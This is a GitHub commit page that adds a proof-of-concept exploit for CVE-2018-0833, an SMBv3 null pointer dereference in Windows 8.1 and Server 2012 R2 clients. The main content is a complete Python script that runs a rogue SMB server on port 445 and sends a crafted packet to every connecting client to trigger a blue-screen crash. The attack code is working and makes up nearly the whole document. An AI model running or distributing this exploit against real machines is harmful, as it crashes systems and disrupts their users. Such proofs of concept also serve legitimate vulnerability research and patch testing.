Skip to content

Commit 07d9ace

Browse files
author
iBearcat
authored
SMBv3 Null Pointer Dereference Denial of Service
1 parent 0e74344 commit 07d9ace

File tree

2 files changed

+22
-0
lines changed

2 files changed

+22
-0
lines changed

CVE-2018-0833/exploit.gif

654 KB
Loading

CVE-2018-0833/poc.py

+22
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
2+
# Date: 26/02/2018
3+
# Exploit Author: Nabeel Ahmed
4+
# Version: SMBv3
5+
# Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
6+
# CVE : CVE-2018-0833
7+
8+
import SocketServer
9+
from binascii import unhexlify
10+
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'
11+
class byebye(SocketServer.BaseRequestHandler):
12+
def handle(self):
13+
try:
14+
print "From:", self.client_address
15+
print "[*]Sending Payload..."
16+
self.request.send(unhexlify(payload))
17+
except Exception:
18+
print "BSoD Triggered on", self.client_address
19+
pass
20+
SocketServer.TCPServer.allow_reuse_address = 1
21+
launch = SocketServer.TCPServer(('', 445),byebye)
22+
launch.serve_forever()

0 commit comments

Comments
 (0)